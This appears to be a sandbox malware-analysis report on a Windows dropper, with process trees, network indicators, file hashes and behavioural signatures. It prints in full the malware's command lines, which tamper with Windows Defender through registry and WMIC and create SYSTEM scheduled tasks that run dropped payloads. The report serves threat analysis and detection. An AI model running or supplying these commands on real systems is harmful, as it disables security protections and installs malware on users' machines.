"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gmdNzcXZw"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "upHNLFTuuiluCLfgh" /SC once /ST 19:43:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe\" Cl /wqhpdidFK 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "upHNLFTuuiluCLfgh"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 240

C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe

C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe Cl /wqhpdidFK 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bqHlMUmkmlcBkJQYdf"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JbudRisgU\RuuYay.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "lRoQVRoUFrjOsqP" /V1 /F

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lRoQVRoUFrjOsqP2" /F /xml "C:\Program Files (x86)\JbudRisgU\OwsbqoD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "lRoQVRoUFrjOsqP"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "lRoQVRoUFrjOsqP"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "vgUxXpnJfcKULt" /F /xml "C:\Program Files (x86)\zpocSIDFTSWU2\iOAVcJD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wpskBTqwKoIAj2" /F /xml "C:\ProgramData\SRtRtaafQKnfEXVB\WRHkjkO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "AStXSHyjxshhAOsqF2" /F /xml "C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\MkacYGZ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "icgpCYtcfpfzsLQuxBY2" /F /xml "C:\Program Files (x86)\VloXEwfyUAdsC\QFuXyqM.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QGYoMddbcQsigCFfl" /SC once /ST 05:32:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LHhfOSCKsioeHeSb\kZrMNrgG\tUwjZkm.dll\",#1 /BpMdidoI 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QGYoMddbcQsigCFfl"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LHhfOSCKsioeHeSb\kZrMNrgG\tUwjZkm.dll",#1 /BpMdidoI 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LHhfOSCKsioeHeSb\kZrMNrgG\tUwjZkm.dll",#1 /BpMdidoI 525403

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "upHNLFTuuiluCLfgh"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 612

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QGYoMddbcQsigCFfl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1512

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 api5.check-data.xyz udp
US 34.217.172.173:80 api5.check-data.xyz tcp

Files

\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe

MD5 d043b671d7e8e9bb086126433ea712b8
SHA1 1f6ebe996416899959a6ac8e0b0453710de99f6d
SHA256 eb377737ba639c12cedaea7b50a86736106a96124f4118091ab621a5f93d6292
SHA512 236db719da09cdb4c38899b4e808c642d71416946eb38588b490a759a87403ac237f9bffcd3ef2c3bc0ebccce689779caa1faf9d984b2b82c45941ad80505211

C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe

MD5 5fe665bef128d199a6ddb92f355a8df8
SHA1 002bbbace8fb07b819f659fee1c7b1611f352371
SHA256 8004f2670dd27de6a59ed85578af4907f99fd28042a2c1a0008b06f36631129b
SHA512 5250857b2cb227a54521643ed078136a05741d919b34c1dfefc3d07573fed09f6e4bdc97b8e2009a585e4d414919258991319b2a3350cbed70a16b249af25dde

memory/2532-24-0x0000000010000000-0x0000000011E5D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ec1e23f5666776e544b782c187964d5d
SHA1 29ef02a4b64567ff1b7b62c453bb989185f6d8e5
SHA256 8fd3b20931f9f7a4345cdb21cf4698a97afa399bf37c05934ab63dd80f0418e0
SHA512 906c66b81517d4ea85810031faf73269cffb2e0a81dc7ea9b5c0bfdc2f6dca0be700041423ad67b3b7a4486fa49b5a4f520afaf6bb32bb0f95cad6a82dce43e5

memory/2960-36-0x0000000010000000-0x0000000011E5D000-memory.dmp

memory/904-45-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/904-46-0x0000000001E70000-0x0000000001E78000-memory.dmp

C:\Windows\Temp\LHhfOSCKsioeHeSb\VJcdqYuV\rMQBgWXPfZzSHRhK.wsf

MD5 03dd0b40d1a3573da22f0437e7890871
SHA1 a3a0edc339b9bf1cd0831834a50d55b51637e78b
SHA256 d087aa475a197d6023586a23b74df4682a4bfbcddaa9092ee4e158d8f62d4bb9
SHA512 514c21e4fc2f20ea4d578e69254e50a9b11c46de878d3be441516f0f215dfc593d50a0a6238049a8bb293ff51cf670a12351d4d1069f0d7eeda9150d66e0dbf7

memory/1856-59-0x000000001B640000-0x000000001B922000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2204-68-0x0000000010000000-0x0000000011E5D000-memory.dmp

memory/2204-79-0x0000000002650000-0x00000000026D5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 7753145895cf8a3816aa270c7917766b
SHA1 f7a28eb80a41e4647b1ef8209701894173303309
SHA256 60a4d2ed81db8462269948d04f9173ba53c1917983c2c508a902bb7b045c263e
SHA512 c8becf8a9938012a4a2bdb6a2a374529bcecb08e66e54383fb0c72e8a8a55c276446f685ebef5c9ba5ae15d0f8837569c48a45c62e343636236ce648015ced6c

memory/2204-112-0x0000000002750000-0x00000000027B7000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 59e32caa6d74ce1d8a0ffd0209ce1e65
SHA1 1b4865c4c51e46a2c1f2f76cf26534d3420a093a
SHA256 51bfb679c1b6a09a748c1a1ae9f29ade439d69de04deb75b7040f3ffa930a4c8
SHA512 9a7a45675834af5b240ccb05e9798ca2c9ae19ec9d77ae4ad9d46dc0f2fad7bb458609fb3c25e0c028ac3c815e306abaa78bec2c8ce38737557eaab07e002cf2

C:\Program Files (x86)\JbudRisgU\OwsbqoD.xml

MD5 1a99fae08f26c2be111260de220fd37e
SHA1 b5212f00ab28cd15409f585e507edbe0b660a82e
SHA256 2bdcd8ab69b9cc71ff82000e4c6a5c9a8fa2eae274cda7356333bcdfc652a1b6
SHA512 1e9275f8bdf1f0901e1f7dc503ab5f30d33bccd3b2088097f86654c33e6bf81483b4321c1b5a2a89d01ba4f3ba1b752d2328dee20fa3992da52b11d4ec379dab

C:\Program Files (x86)\zpocSIDFTSWU2\iOAVcJD.xml

MD5 8d836040f776ad44b8999db01af58d36
SHA1 6e8f576835006a87c2f52ae3bdce83774f638e5f
SHA256 f41e02b89e307d7898f23a60e083267860f9fe7ce4118b5fc69e2733d947d382
SHA512 dad870f2f50651212fd6695537b63a82f69336f41c69b245cb209ca7c67765893bcabf2ca38f0480d67dca20dc00c37d9fd290188e3eadd37cef6a4c2e91d872

C:\ProgramData\SRtRtaafQKnfEXVB\WRHkjkO.xml

MD5 62b10b5077d3d5542c47bd5239d7a213
SHA1 59285ecdbc55a9e67c34758d5a6047e19c13e08b
SHA256 d2a230bda8884c294b21eecdbc3be2dae7c0acb9df7806b9acef967f1f9433d0
SHA512 3352fdedda4877469e9e40bb45c713f6883b156d75f2cb9a801d3f7b4fbd256813fd23952587d374bdc74fe2ef5d15915680755fa985a28ec73453ff4f1147b4

C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\MkacYGZ.xml

MD5 81baca69ece362111ce982d2bc1b4438
SHA1 567d30f43cc7aed30a28714feb5f486b167ab848
SHA256 54be7c690999d894444539c73bd9d433b4d1602d22b6b5411f0c633bed3c001f
SHA512 bf09ade800f18238daf8f731c631adac60977d39c5caf1e6b1955c401fc21325baef3c0a4d09c30704b6541e2201de4ce819c0d06346d43ab2fe4a894aff64e0

C:\Program Files (x86)\VloXEwfyUAdsC\QFuXyqM.xml

MD5 0ff65ad59c63e3e8f2fb88ce4e3a4455
SHA1 24cdeebc5864ad73699fc324e786f2e75c7c7a02
SHA256 4fa48a32a12300712bccec028992fb4099eedd3e1fa21031a58fab09686d1553
SHA512 d4bc24773f796b832c56fd049c027077ea26cdb39bb8f0c10d12fc5a891a11142093aeda9d92f43c6f489ae75820ce4c6fa4d45bed94ccdbf8811fc918ed6479

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.js

MD5 5c1ebf74c5adc9c6ead0b3a620f1552d
SHA1 ece869c55dc8cf1f75309614d8767b3a797463bb
SHA256 97c07e91c47002e9ed5e6244e756c21fe7b0886f1bf1ab0f1be621ed27a5ddf6
SHA512 42649417282794fae8427c3d771e21c92a39dfb6987e89ebe1ed146b3c13888fecf975d55d43fb43e4bc7babe1b7d40c81e79b5fda5c841003baa6f5ac9d5676

memory/2204-295-0x0000000002B20000-0x0000000002BA8000-memory.dmp

C:\Windows\Temp\LHhfOSCKsioeHeSb\kZrMNrgG\tUwjZkm.dll

MD5 0320220ef885e75e5aaf88ea3f05344a
SHA1 a49a7bebfa775ca15e4476d7e428d7e0ce6c1224
SHA256 3a08912e795f1a6ff69ab34760a60cb54b248fc199fed6762a037003d8548360
SHA512 731143275c2f443bc3679321885203ccb4cd2f0d47933c2dfac8079fc64c63310ef2437fea8fa9eeffe5c13702d8d01b160537e5a9c58142a7ac2ba9fc786027

memory/2204-305-0x0000000002F60000-0x0000000003049000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f03c73ec345c04cdba3732f7622a153e
SHA1 f80f868b2a3a8808086eaa319994a698a5f2b0cc
SHA256 dfb8354c14d60af3908dd014cf4e33a065e42381da766e6e49d610fb8ae19acd
SHA512 0c7469d2aeddc6a9b07617b1a368572922dded57d21e2f55a8fcd16808e0bda6c3b272c3b482b5bec1d688c537009a82db1b2b0453679a63e17d069eb4690ace

memory/2760-332-0x00000000013A0000-0x00000000031FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 23:33

Reported

2024-06-13 23:38

Platform

win10-20240611-en

Max time kernel

169s

Max time network

262s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBA57.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSBEEB.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\MXFlCHO.exe N/A
